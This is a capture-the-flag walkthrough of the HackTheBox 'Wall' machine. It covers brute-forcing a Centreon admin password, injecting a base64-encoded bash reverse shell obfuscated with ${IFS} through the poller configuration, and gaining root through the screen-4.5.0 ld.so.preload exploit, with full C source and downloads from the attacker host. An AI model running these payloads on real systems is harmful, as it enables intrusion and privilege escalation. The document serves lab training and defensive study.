WALL – (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.157

Now try to access http://10.10.10.157

root@kali:~/Downloads# gobuster dir -u http://10.10.10.157 -w /usr/share/wordlists/dirb/common.txt

Now on browser

http://10.10.10.157/monitoring

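Now on terminal, request the same path with POST instead of GET, to check whether access to /monitoring is handled the same way for every HTTP method (an access rule limited to specific methods leaves the others unprotected):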

root@kali:~/Downloads# curl -X POST http://10.10.10.157/monitoring/

Now on browser try to access

http://10.10.10.157/centreon/

root@kali:~/Downloads# wfuzz -c -X POST -d “username=admin&password=FUZZ” -w ./darkweb2017-top10000.txt http://10.10.10.157/centreon/api/index.php?action=authenticate

Back to portal

Username : admin

Password : password1

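And we are in: the admin account was protected only by a password that appears in a common-password wordlist, and the authentication API evidently accepted repeated guesses.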

I checked the version of Centreon; it was 19.04. Next, start a listener on the attacking machine:

root@kali:~/Downloads# nc -lvnp 1337

on the portal

Configuration > poller

root@kali:~/Downloads# echo ‘bash -i >& /dev/tcp/10.10.14.158/1337 0>&1’ | base64

root@kali:~/Downloads# echo “echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg== | base64 -d |bash” |sed ‘s/ /${IFS}/g’

root@kali:~/Downloads# echo “echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg== | base64 -d |bash”

Copy the output of the sed command above, in which every space has been replaced by ${IFS}:

echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash

now on portal

Save it

Now select the central and click on export configuration

Now click on export

And at the listener we get the shell

www-data@Wall:/usr/local/centreon/www$ cd /home

www-data@Wall:/home$ ls -la

www-data@Wall:/home$ cd shelby

www-data@Wall:/home/shelby$ cat user.txt

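I searched for SUID binaries and found screen-4.5.0, which allows the same privilege escalation used on Flujab: as a setuid-root program it creates its log file with root privileges, so an unprivileged user can have it write /etc/ld.so.preload (see the commands below). Auditing SUID binaries and removing or updating this one closes the path.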

https://www.exploit-db.com/exploits/41154

on another terminal

root@kali:~/Downloads# nano libhax.c

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

/*
 * dropshell - library constructor from the screen-4.5.0 exploit linked above.
 *
 * The GCC constructor attribute makes this function run automatically when
 * the shared object is loaded into a process; nothing calls it explicitly.
 * Later on this page the library path is written to /etc/ld.so.preload and a
 * SUID binary is started, so the calls below are presumably made with root
 * privileges (without them chown/chmod/unlink would simply fail; none of the
 * return values is checked).
 *
 * Artefacts worth checking for during triage: an unexpected
 * /etc/ld.so.preload, and a root-owned setuid file under /tmp.
 */
__attribute__ ((__constructor__))

void dropshell(void){

    /* Hand ownership of the helper binary to uid 0 / gid 0. */
    chown(“/tmp/rootshell”, 0, 0);

    /* 04755 = setuid bit plus rwxr-xr-x. */
    chmod(“/tmp/rootshell”, 04755);

    /* Remove the preload entry so the library is no longer loaded into other processes. */
    unlink(“/etc/ld.so.preload”);

    printf(“[+] done!\n”);

}

Save it

root@kali:~/Downloads# nano rootshell.c

#include <stdio.h>

/*
 * main - sets the real and effective user and group IDs to 0, then replaces
 * the process image with /bin/sh.
 *
 * The set*id(0) calls only succeed for a process that is already privileged,
 * e.g. when this binary is root-owned with the setuid bit set, which is what
 * dropshell() in libhax.c does to /tmp/rootshell. Return values are not
 * checked, so a failed call goes unnoticed.
 */
int main(void){

    /* Real, then effective, user and group IDs are all set to 0 (root). */
    setuid(0);

    setgid(0);

    seteuid(0);

    setegid(0);

    /*
     * NOTE(review): execvp() is specified with two parameters (file, argv);
     * three are passed here, and this listing includes only <stdio.h>, so
     * none of the calls in this function has a declaration in scope.
     */
    execvp(“/bin/sh”, NULL, NULL);

}

root@kali:~/Downloads# gcc -fPIC -shared -ldl -o libhax.so libhax.c

root@kali:~/Downloads# gcc -o rootshell rootshell.c

root@kali:~/Downloads# python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 …

Now on shell

www-data@Wall:/tmp$ wget http://10.10.14.158:8080/libhax.so

www-data@Wall:/tmp$ wget http://10.10.14.158:8080/rootshell

www-data@Wall:/tmp$ cd /etc

www-data@Wall:/etc$ umask 000

www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  “\x0a/tmp/libhax.so”

www-data@Wall:/etc$ /bin/screen-4.5.0 –ls

www-data@Wall:/etc$ /tmp/rootshell

whoami

id

cd /home/shelby

cat user.txt

fe6194544f452f62XXXXXXXXXXXXXXXXX

cd /root

cat root.txt

1fdbcf8c33eaaXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT